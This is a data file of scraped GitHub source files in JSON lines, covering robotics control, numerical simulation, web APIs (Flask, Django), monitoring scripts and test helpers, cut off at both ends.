Used for testing application without phidgets.'''\n\n def __init__(self, omega,refreshPeriod,sensorName=None):\n '''\n Constructor for dummy sensor. omega is used to change frquency of output sin wave.\n '''\n self.refreshPeriod = refreshPeriod*1000.0\n self.sensorName = sensorName\n self.omega = omega\n self.sensorUnits = \"N/A\"\n self.times =[ ]\n self.data = []\n self.startTime = time.time()\n\n def getData(self):\n '''\n Overrides getData method from Sensor. Returns time and dummy sensor values\n as well as all values logged since last refresh period\n '''\n if time.time()- self.startTime > 15:\n self.data = []\n self.times = []\n self.startTime =time.time()\n y = np.sin(self.omega*time.time())\n x= time.time()-self.startTime\n self.times.append(x)\n self.data.append(y)\n return([time.time()],[y],self.times,self.data )\n","repo_name":"hipersfera/PhidgetDataLogger","sub_path":"DummySensor.py","file_name":"DummySensor.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13242169821","text":"# -*- coding: utf-8 -*-\n\n# input module\n\n\ndef splitnumbers(delimiter, str):\n newlist = []\n tmp = ''\n\n for c in str:\n if c == delimiter:\n if len(tmp) == 0:\n continue\n else:\n newlist.append(int(tmp))\n tmp = ''\n else:\n tmp += c\n \"\"\"for i, c in enumerate(str):\n if str[i] == delimiter:\n if len(tmp) == 0:\n continue\n else:\n newlist.append(int(tmp))\n tmp = ''\n else:\n tmp += c\"\"\"\n if len(tmp) != 0:\n newlist.append(int(tmp))\n tmp = ''\n\n if len(newlist) == 0:\n return None\n else:\n return newlist\n\n\ndef loadfromfile(filepath):\n file = open(filepath, 'rt')\n buff = file.readline()\n nums1 = splitnumbers(' ', buff)\n buff = file.readline()\n nums2 = splitnumbers(' ', buff)\n return nums1, nums2\n\n\ndef getfrominput():\n ok = True\n newlist = []\n while ok:\n x = input(\"Enter the element (~ for end of input) : \")\n if x == \"~\":\n ok = False\n else:\n newlist.append(int(x))\n if len(newlist) == 0:\n return None\n else:\n return newlist\n","repo_name":"floatint/TasksOOP","sub_path":"Task_1_21/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22557908731","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport rospy\n#import picamera\nimport math\nfrom cv_bridge import CvBridge\nbridge = CvBridge()\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float32MultiArray\nimport cv2\nimport time\nimport torch\nimport torch.nn as nn\nfrom torchvision import datasets ,transforms\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport torch.optim as optim\nimport torchvision\n\nweight_path_angle = \"/home/ubuntu/subt-duckiefloat/catkin_ws/src/duckiefloat_control/src/line_angle_71.pth\"\nweight_path_distance = \"/home/ubuntu/subt-duckiefloat/catkin_ws/src/duckiefloat_control/src/line_center_83.pth\"\n\nclass Temp_Model_angle(nn.Module):\n def __init__(self):\n super(Temp_Model_angle, self).__init__()\n self.conv1 = nn.Sequential( \n nn.Conv2d(\n in_channels=3, \n out_channels=32, \n kernel_size=4, \n stride=1, \n padding=0, \n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv2 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv3 = nn.Sequential( \n 
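# conv3 repeats the conv2 stage (32->32 channels, 4x4 kernel, 2x2 max-pool); each of the four conv+pool stages roughly halves the spatial size, which is what makes the flattened feature 38528-dimensional for the input resolution this network assumes -- the in_features of fc1 below would change for a different camera image size\n            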
nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv4 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=1,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.fc1 = nn.Linear(38528, 200)\n self.fc2 = nn.Linear(200, 13)\n \n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\nclass Temp_Model_distance(nn.Module):\n def __init__(self):\n super(Temp_Model_distance, self).__init__()\n self.conv1 = nn.Sequential( \n nn.Conv2d(\n in_channels=3, \n out_channels=32, \n kernel_size=4, \n stride=1, \n padding=0, \n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv2 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv3 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv4 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=1,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.fc1 = nn.Linear(38528, 200)\n self.fc2 = nn.Linear(200, 10)\n \n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\nclass Pose(object):\n def __init__(self):\n self.node_name = rospy.get_name()\n self.initial()\n self.count = 0\n self.dcc = 0.16\n self.state = None\n self.Angle = np.array([-30,-40,-50,-60,-70,-80,30,40,50,60,70,80,0]) #L-----R, S\n self.Distance = np.array([-70,-140,-210,-280,-350,70,140,210,280,350]) #L-----R\n self.Pose_c = rospy.Publisher(\"/state_estimator_node/current_pose\", Float32MultiArray, queue_size = 1)\n self.Pose_t = rospy.Publisher(\"/state_estimator_node/target_pose\", Float32MultiArray, queue_size = 1)\n self.img_sub = rospy.Subscriber('img', Image, self.c_pose, queue_size = 1)\n\n def initial(self):\n self.model_angle = Temp_Model_angle()\n self.model_distance = Temp_Model_distance()\n self.model_angle.load_state_dict(torch.load(weight_path_angle))\n self.model_distance.load_state_dict(torch.load(weight_path_distance))\n\n def c_pose(self, data):\n self.count += 1\n if self.count == 1:\n self.count = 0\n try:\n # convert image_msg to cv format\n img = bridge.imgmsg_to_cv2(data, desired_encoding = \"passthrough\")\n #img = cv2.resize(img, self.dim)\n\n data_transform = transforms.Compose([\n transforms.ToTensor()])\n img = data_transform(img)\n images = torch.unsqueeze(img,0)\n \n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n images = images.to(device)\n self.model_angle = self.model_angle.to(device)\n self.model_distance = self.model_distance.to(device)\n\n output_angle = self.model_angle(images)\n output_distance = self.model_distance(images)\n top1 = output_angle.argmax()\n top2 = output_distance.argmax()\n self.angle = self.Angle[top1]\n self.distance = self.Distance[top2]\n \n # pose estimate\n current_pose = Float32MultiArray()\n target_pose = Float32MultiArray()\n # L & left(d<0)\n if (self.angle < 0) and (self.distance < 0):\n self.distance = (-1)*(self.distance*math.sin(math.radians(self.angle)) - 
self.dcc*math.cos(math.radians(self.angle)))\n                self.angle = 90 + self.angle\n                self.state = 'L'+str(self.angle)+'D'+str(self.distance)\n            # L & right(d>0)\n            if (self.angle < 0) and (self.distance > 0):\n                self.distance = (-1)*self.distance*math.sin(math.radians(self.angle)) + self.dcc*math.cos(math.radians(self.angle))\n                self.angle = 90 + self.angle\n                self.state = 'L'+str(self.angle)+'D'+str(self.distance)\n            # R & left(d<0)\n            if (self.angle > 0) and (self.distance < 0):\n                self.distance = (-1)*((-1)*self.distance*math.sin(math.radians(self.angle)) + self.dcc*math.cos(math.radians(self.angle)))\n                self.angle = 90 - self.angle\n                self.state = 'R'+str(self.angle)+'D'+str(self.distance)\n            # R & right(d>0)\n            if (self.angle > 0) and (self.distance > 0):\n                self.distance = self.distance*math.sin(math.radians(self.angle)) - self.dcc*math.cos(math.radians(self.angle))\n                self.angle = 90 - self.angle\n                self.state = 'R'+str(self.angle)+'D'+str(self.distance)\n            # S\n            if self.angle == 0:\n                self.distance = self.distance\n                self.angle = self.angle\n                self.state = 'S'+str(self.angle)+'D'+str(self.distance)\n\n            # Float32MultiArray carries its values in the .data field; indexing the\n            # message object directly would raise a TypeError\n            current_pose.data = [self.distance, self.angle]\n            target_pose.data = [0.0, 0.0]\n            \n            self.Pose_c.publish(current_pose)\n            self.Pose_t.publish(target_pose)\n            \n            rospy.loginfo('\\n'+self.state+'\\n')\n\n        except Exception as e:  # CvBridgeError is not imported in this module, so catch broadly\n            print(e)\n\nif __name__ == \"__main__\":\n    rospy.init_node(\"lane_follow\", anonymous=False)\n    POSE = Pose()\n    rospy.spin()\n","repo_name":"ARG-NCTU/duckiefloat_ros","sub_path":"duckiefloat_control/src/lane_follow.py","file_name":"lane_follow.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32180813444","text":"import os\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef getQ(lines):\n    Q = []\n    for i in range(1, len(lines)):\n        tempQ = lines[i].split('\\t')[0]\n        Q += [float(tempQ)]\n    return np.array(Q)\n\npath = '../Suddenpollution/'\nfiles = os.listdir(path)\nQ = []\nfor file in files:\n    fin = open(path+file)\n    lines = fin.readlines()\n    fin.close()\n    tempQ = getQ(lines)\n    Q += [tempQ]\n    fig, ax = plt.subplots()\n    x = np.linspace(0,1, len(Q[0]))\n    ax.plot(x, tempQ, 'k--')\n    plt.savefig(str(file.split('.')[0])+'.jpg')\n\n\n","repo_name":"Hydro6410/Demo","sub_path":"Datain/code/Sudeenpollution.py","file_name":"Sudeenpollution.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4336647659","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 13:19:40 2017\n\n@author: Massimo De Mauri\n\"\"\"\n\nimport MIRT_OC as oc\n\ndef integrate_ode(x,p,ode,dt,options = None):\n\n    opts = {}\n    opts['schema'] = 'rk4'\n    opts['n_steps'] = 1\n\n\n\n    if options is not None:\n        for k in options:\n            if k in opts:\n                opts[k] = options[k]\n            else:\n                oc.warn('Option not recognized: ' + k)\n\n    if opts['schema'] == 'e_euler':\n\n        table = oc.DM([[0,0],[0,1]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'i_euler':\n\n        table = oc.DM([[1,1],[0,1]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'rk4':\n\n        table = oc.DM([[0,0,0,0,0],[.5,.5,0,0,0],[.5,0,.5,0,0],[1,0,0,1,0],[0,1/6,1/3,1/3,1/6]])\n        intg = 
oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'ralston':\n\n        table = oc.DM([[0,0,0],[2/3,2/3,0],[0,.25,.75]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'gl2':\n\n        table = oc.DM([[.5,.5],[0,1]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'gl4':\n\n        table = oc.DM([[.5+oc.sqrt(3)/6,.25,.25+oc.sqrt(3)/6],[.5-oc.sqrt(3)/6,.25-oc.sqrt(3)/6,.25],[0,.5,.5]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    elif opts['schema'] == 'gl6':\n\n        table = oc.DM([[.5-oc.sqrt(15)/10,5/36,2/9-oc.sqrt(15)/15,5/36-oc.sqrt(15)/30],[.5,5/36+oc.sqrt(15)/24,2/9,5/36-oc.sqrt(15)/24],[.5+oc.sqrt(15)/10,5/36+oc.sqrt(15)/30,2/9+oc.sqrt(15)/15,5/36],[0,5/18,4/9,5/18]])\n        intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n\n    elif type(opts['schema']) == type(oc.DM()):\n\n        # presumably a user-supplied Butcher table passed directly as a DM\n        intg = oc.butcher_integrator('F',opts['schema'],{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n    else:\n        raise NameError(opts['schema'] + ' not implemented')\n\n\n    return intg\n","repo_name":"MassimoDM/MIRT_OC","sub_path":"src/integration/integrate_ode.py","file_name":"integrate_ode.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72529748073","text":"\n# The difference with _v3 is that here the particles can have different mass and the gravitational acceleration calculation is accordingly modified.\n# The difference with _v2 is that here we incorporate shear viscosity by using the Balsara switch.\n# The difference with the previous version is that here the u and u_previous, ut_previous updates are handled separately. 
See below.\n# modified to be used with any number of CPUs.\n# New h algorithm is employed !\n\nimport numpy as np\nimport time\nimport pickle\nimport os\nfrom libsx2_2t import *\nfrom mpi4py import MPI\nfrom shear_test3_t_del import *\nimport pandas as pd\n\n\nnp.random.seed(42)\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nnCPUs = comm.Get_size()\n\ndf = pd.read_csv('../test_data.csv', names = ['x', 'y', 'z', 'hprevious'])\nx = df['x'].values\ny = df['y'].values\nz = df['z'].values\n\nr = np.array([x, y, z]).T\n\nprint(r.shape)\n\nh_previous = df['hprevious'].values\n\n\nN = x.shape[0]\n\n#------- used in MPI --------\ncount = N // nCPUs\nremainder = N % nCPUs\n\nif rank < remainder:\n\tnbeg = rank * (count + 1)\n\tnend = nbeg + count + 1\nelse:\n\tnbeg = rank * count + remainder\n\tnend = nbeg + count\n#----------------------------\n\nif rank ==0:\n\tT_h = time.time()\n\nlocal_h = smoothing_fast_new_mpi2(nbeg, nend, r, h_previous)\nh = 0.0\n\nif rank == 0:\n\th = local_h\n\tfor i in range(1, nCPUs):\n\t\thtmp = comm.recv(source = i)\n\t\th = np.concatenate((h, htmp))\nelse:\n\tcomm.send(local_h, dest = 0)\n\nh = comm.bcast(h, root = 0)\n\nif rank == 0:\n\tprint()\n\tprint('T_h = ', time.time() - T_h)\n\tprint()\n\tfor i in range(10):\n\t\tprint(np.round(h_previous[i], 4), np.round(h[i], 4))\n#----------------------\n\n\n\n","repo_name":"hassanfv/SPH_2","sub_path":"11_Dec_2022/MPI_sph/Isothermal_collapse_Aug_2022/Using_Slow_h/Anathpindika_II/Model_4/subSampling_IC/GPU_test/smoothing_h/h_mpi.py","file_name":"h_mpi.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33971325866","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport functools\nimport logging\nimport sys\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport click\nimport datadog\n\nfrom monitor import config, reporting\nfrom monitor.main import determine_commit_replication_status\nfrom monitor.pulse import run_pulse_listener\nfrom monitor.sentry import record_exceptions\n\n\n@click.command()\n@click.option(\n \"--debug\",\n envvar=\"DEBUG\",\n is_flag=True,\n help=\"Print debugging messages about the script's progress.\",\n)\n@click.argument(\"node_ids\", nargs=-1)\ndef display_lag(debug, node_ids):\n \"\"\"Display the replication lag for a repo or an individual commit.\n\n Does not drain any queues or send any data.\n \"\"\"\n if debug:\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n mirror = config.mirror_config_from_environ()\n\n if node_ids:\n for node_id in node_ids:\n status = determine_commit_replication_status(mirror, node_id)\n reporting.print_replication_lag(mirror, status)\n else:\n pulse_config = config.pulse_config_from_environ()\n run_pulse_listener(\n pulse_config.PULSE_USERNAME,\n pulse_config.PULSE_PASSWORD,\n pulse_config.PULSE_EXCHANGE,\n pulse_config.PULSE_QUEUE_NAME,\n pulse_config.PULSE_QUEUE_ROUTING_KEY,\n pulse_config.PULSE_QUEUE_READ_TIMEOUT,\n True,\n worker_args=dict(\n mirror_config=mirror, reporting_function=reporting.print_replication_lag\n ),\n )\n\n\n@click.command()\n@click.option(\n \"--debug\",\n envvar=\"DEBUG\",\n is_flag=True,\n help=\"Print debugging messages about the script's progress.\",\n)\n@click.option(\n \"--no-send\",\n is_flag=True,\n help=\"Do not drain any queues or send any data. Useful for debugging.\",\n)\ndef report_lag(debug, no_send):\n \"\"\"Measure and report repository replication lag to a metrics service.\"\"\"\n\n if debug:\n log_level = logging.DEBUG\n else:\n log_level = logging.INFO\n\n logging.basicConfig(stream=sys.stdout, level=log_level)\n\n mirror = config.mirror_config_from_environ()\n pulse_config = config.pulse_config_from_environ()\n\n if no_send:\n reporting_function = reporting.print_replication_lag\n empty_queue_function = None\n else:\n datadog.initialize()\n reporting_function = reporting.report_to_statsd\n empty_queue_function = functools.partial(\n reporting.report_all_caught_up_to_statsd, mirror\n )\n\n @record_exceptions\n def job():\n run_pulse_listener(\n pulse_config.PULSE_USERNAME,\n pulse_config.PULSE_PASSWORD,\n pulse_config.PULSE_EXCHANGE,\n pulse_config.PULSE_QUEUE_NAME,\n pulse_config.PULSE_QUEUE_ROUTING_KEY,\n pulse_config.PULSE_QUEUE_READ_TIMEOUT,\n no_send,\n worker_args=dict(\n mirror_config=mirror, reporting_function=reporting_function\n ),\n empty_queue_callback=empty_queue_function,\n )\n\n sched = BlockingScheduler()\n\n # Run once right away, then run at intervals\n sched.add_job(job)\n sched.add_job(job, \"interval\", minutes=5)\n\n # This does not return\n sched.start()\n","repo_name":"mozilla-conduit/phabricator-repo-monitor","sub_path":"src/monitor/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69889733352","text":"# Author: Christian Brodbeck \nfrom ..fmtxt import Section\nfrom ._sensor import sensor_results, sensor_time_results\nfrom ._source import source_time_results\nfrom ._uts import time_results\n\n\ndef result_report(res, ds, title=None, colors=None):\n 
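# result_report dispatches on the set of dimensions in the test result (time / sensor / source) and delegates to the matching report builder; unknown combinations raise NotImplementedError below\n    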
\"\"\"Automatically generate section from an NDTest result object\n\n Parameters\n ----------\n res : NDTest\n Test-result.\n ds : Dataset\n Dataset containing the data on which the test was performed.\n \"\"\"\n sec = Section(title or res._name())\n\n dims = {dim.name for dim in res._dims}\n sec.append(res.info_list())\n\n if dims == {'time'}:\n sec.append(time_results(res, ds, colors))\n elif dims == {'sensor'}:\n sec.append(sensor_results(res, ds, colors))\n elif dims == {'time', 'sensor'}:\n sec.append(sensor_time_results(res, ds, colors))\n elif dims == {'time', 'source'}:\n sec.append(source_time_results(res, ds, colors))\n else:\n raise NotImplementedError(\"dims=%r\" % dims)\n return sec\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/report/_auto.py","file_name":"_auto.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"28343119744","text":"from flask import Flask, request, jsonify, url_for, Blueprint\nfrom api.app.user.controller import register_owner, register_admin, login_user, get_user_by_id, update_user_info\nfrom api.app.rel_user_community.controller import create_rel\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nfrom api.app.rel_user_community.controller import delete_rel\n\nusers = Blueprint('users', __name__)\n\n#REGISTER OWNER\n@users.route('/register/owner/', methods=['POST'])\ndef create_user_owner(community_id):\n body = request.get_json()\n new_user = register_owner(body)\n if new_user is None:\n return jsonify('Internal server error'), 500\n elif new_user == False:\n return jsonify('Bad Request'), 400\n else:\n create_rel(community_id, new_user[\"id\"])\n return jsonify(new_user), 201\n\n#REGISTER ADMIN\n@users.route('/register/admin', methods=['POST'])\ndef create_user_admin():\n body = request.get_json()\n new_user = register_admin(body)\n if new_user is None:\n return jsonify('Internal server error'), 500\n elif new_user == False:\n return jsonify('Bad Request'), 400\n else:\n return jsonify(new_user), 201\n\n#LOGIN\n@users.route('/login', methods=['POST'])\ndef user_login():\n body = request.get_json()\n token = login_user(body)\n print(token)\n if token == 'User does not exist':\n return jsonify(token), 404\n\n elif token == 'Incorrect password':\n return jsonify('Incorrect password'), 401\n\n elif token is None :\n return jsonify('Internal server error'), 500\n else:\n return jsonify(token), 200\n\n#GET USER BY ID\n@users.route(\"/\", methods=['GET'])\n@jwt_required()\ndef get_user():\n user_id = get_jwt_identity()\n user = get_user_by_id(user_id['id'])\n if user is None:\n return jsonify('User not found'), 404\n\n return jsonify(user.serialize()), 200\n\n#UPDATE USER INFO\n@users.route('/modify', methods=['PUT'])\n@jwt_required()\ndef modify_user_info():\n id_user = get_jwt_identity()\n body = request.get_json()\n return update_user_info(id_user[\"id\"], body)\n\n#DELETE USER\n@users.route('/delete/', methods=['DELETE'])\n@jwt_required()\ndef user_delete(user_id_to_delete):\n id_user = get_jwt_identity()\n user = get_user_by_id(id_user[\"id\"]).serialize()\n delete_rel(user_id_to_delete)\n return delete_user(user[\"role\"][\"role_id\"], 
user_id_to_delete)\n\n\n\n\n\n\n","repo_name":"Sergiogtz10/Gestion-de-comunidades","sub_path":"src/api/app/user/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22573618507","text":"# 하샤드 수 찾기\ndef solution(x):\n strNum = list(str(x))\n findNum = 0\n for i in range(len(strNum)):\n findNum += int(strNum[i])\n if x % findNum == 0:\n return True\n else:\n return False\n\n# 테스트 돌리기\n\nnum = 123\nprint(solution(num))","repo_name":"jjiwoning/Code_Test","sub_path":"python_algo/Programmers/harshad_number.py","file_name":"harshad_number.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33136177704","text":"import json\nimport time\nfrom functools import wraps\n\nimport dcos\nimport shakedown\n\nfrom tests.defaults import (\n DEFAULT_NODE_COUNT,\n PACKAGE_NAME,\n TASK_RUNNING_STATE,\n)\n\n\nWAIT_TIME_IN_SECONDS = 600\n\n\ndef as_json(fn):\n @wraps(fn)\n def wrapper(*args, **kwargs):\n try:\n return json.loads(fn(*args, **kwargs))\n except ValueError:\n return None\n\n return wrapper\n\n\ndef cassandra_api_url(basename, app_id='cassandra'):\n return '{}/v1/{}'.format(shakedown.dcos_service_url(app_id), basename)\n\n\ndef check_health():\n def fn():\n return shakedown.get_service_tasks(PACKAGE_NAME)\n\n def success_predicate(tasks):\n running_tasks = [t for t in tasks if t['state'] == TASK_RUNNING_STATE]\n print('Waiting for {} healthy tasks, got {}/{}'.format(\n DEFAULT_NODE_COUNT, len(running_tasks), len(tasks)))\n return (\n len(running_tasks) == DEFAULT_NODE_COUNT,\n 'Service did not become healthy'\n )\n\n return spin(fn, success_predicate)\n\n\ndef get_cassandra_config():\n response = request(\n dcos.http.get,\n marathon_api_url('apps/{}/versions'.format(PACKAGE_NAME))\n )\n assert response.status_code == 200, 'Marathon versions request failed'\n\n version = response.json()['versions'][0]\n\n response = dcos.http.get(marathon_api_url('apps/{}/versions/{}'.format(PACKAGE_NAME, version)))\n assert response.status_code == 200\n\n config = response.json()\n del config['uris']\n del config['version']\n\n return config\n\n\n@as_json\ndef get_dcos_command(command):\n result, error = shakedown.run_dcos_command(command)\n if error:\n raise RuntimeError(\n 'command dcos {} {} failed'.format(command, PACKAGE_NAME)\n )\n\n return result\n\n\ndef marathon_api_url(basename):\n return '{}/v2/{}'.format(shakedown.dcos_service_url('marathon'), basename)\n\n\ndef request(request_fn, *args, **kwargs):\n def success_predicate(response):\n return (\n response.status_code in [200, 202],\n 'Request failed: %s' % response.content,\n )\n\n return spin(request_fn, success_predicate, *args, **kwargs)\n\n\ndef spin(fn, success_predicate, *args, **kwargs):\n end_time = time.time() + WAIT_TIME_IN_SECONDS\n while time.time() < end_time:\n result = fn(*args, **kwargs)\n is_successful, error_message = success_predicate(result)\n if is_successful:\n print('Success state reached, exiting spin. prev_err={}'.format(error_message))\n break\n print('Waiting for success state... 
err={}'.format(error_message))\n time.sleep(1)\n\n assert is_successful, error_message\n\n return result\n\n\ndef uninstall():\n print('Uninstalling/janitoring {}'.format(PACKAGE_NAME))\n try:\n shakedown.uninstall_package_and_wait(PACKAGE_NAME, app_id=PACKAGE_NAME)\n except (dcos.errors.DCOSException, ValueError) as e:\n print('Got exception when uninstalling package, continuing with janitor anyway: {}'.format(e))\n\n shakedown.run_command_on_master(\n 'docker run mesosphere/janitor /janitor.py '\n '-r cassandra-role -p cassandra-principal -z dcos-service-cassandra '\n '--auth_token={}'.format(\n shakedown.run_dcos_command(\n 'config show core.dcos_acs_token'\n )[0].strip()\n )\n )\n","repo_name":"verma7/dcos-cassandra-service","sub_path":"integration/tests/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72181937193","text":"from django.http.response import JsonResponse\n\n# Create your views here.\nfrom django.views.generic.base import TemplateView\nfrom mongoengine.errors import DoesNotExist\nimport numpy\nimport geometry\nfrom socialparq.models import ZonaParquimetro\n\n\nclass JSONResponseMixin(object):\n def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(context, **response_kwargs)\n\n\nclass JsonView(JSONResponseMixin, TemplateView):\n def render_to_response(self, context, **response_kwargs):\n return self.render_to_json_response(context, **response_kwargs)\n\n\nclass ZonaParqsView(JsonView):\n def get_context_data(self, **kwargs):\n context = {'zonas': []}\n\n for zona in ZonaParquimetro.objects:\n context['zonas'].append({'id': str(zona.pk), 'nombre': zona.nombre})\n\n return context\n\n\nclass PoligonoZonaView(JsonView):\n def get_context_data(self, **kwargs):\n zona_id = self.request.GET.get('zona', '')\n if not zona_id:\n return {}\n try:\n zona = ZonaParquimetro.objects.get(pk=zona_id)\n except DoesNotExist:\n return {}\n\n context = {'puntos': []}\n\n for point in zona.area['coordinates']:\n context['puntos'].append({'latitud': point[1], 'longitud': point[0]})\n\n return context\n\n\nclass PoligonosView(JsonView):\n def get_context_data(self, **kwargs):\n context = {'zonas': []}\n for zona in ZonaParquimetro.objects:\n context['zonas'].append(\n {'points': [{'latitud': point[1], 'longitud': point[0]} for point in zona.area['coordinates']]})\n\n return context\n\n\nclass EquipoZonaView(JsonView):\n def get_context_data(self, **kwargs):\n zona_id = self.request.GET.get('zona', '')\n if not zona_id:\n return {}\n try:\n zona = ZonaParquimetro.objects.get(pk=zona_id)\n except DoesNotExist:\n return {}\n\n context = {'puntos': []}\n\n for point in zona.lista_equipos:\n context['puntos'].append({'latitud': point[1], 'longitud': point[0]})\n\n return context\n\n\nclass PoligonoCoordenadaView(JsonView):\n def get_context_data(self, **kwargs):\n latitud = self.request.GET.get('latitud', '')\n longitud = self.request.GET.get('longitud', '')\n if not longitud or not latitud:\n return {}\n\n latitud, longitud = float(latitud), float(longitud)\n zona_encontrada = None\n context = {}\n\n for zona in ZonaParquimetro.objects:\n poligono = zona.area['coordinates']\n if geometry.point_in_poly(longitud, latitud, poligono) or geometry.point_on_border(longitud, latitud,\n poligono):\n zona_encontrada = zona\n break\n\n if not zona_encontrada:\n return {}\n\n context['zona'] = ({'id': str(zona_encontrada.pk), 'nombre': 
zona_encontrada.nombre,\n 'equipos': [{'latitud': point[1], 'longitud': point[0]} for point in zona.lista_equipos]})\n\n return context\n\n\nclass ParquimetroMasCercano(JsonView):\n def get_context_data(self, **kwargs):\n latitud = self.request.GET.get('latitud', '')\n longitud = self.request.GET.get('longitud', '')\n if not longitud or not latitud:\n return {}\n\n latitud, longitud = float(latitud), float(longitud)\n\n puntos = []\n for zona in ZonaParquimetro.objects:\n for equipo in zona.lista_equipos:\n puntos.append([equipo[0], equipo[1]])\n puntos = numpy.array(puntos)\n\n nearest = geometry.find_nearest_vector(puntos, [latitud, longitud])\n\n return {'latitud': nearest[1], 'longitud': nearest[0]}\n\n\n","repo_name":"imarban/socialparq","sub_path":"socialparq/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12538151088","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n\n output = []\n\n def dfs(node):\n if not node:\n return\n\n 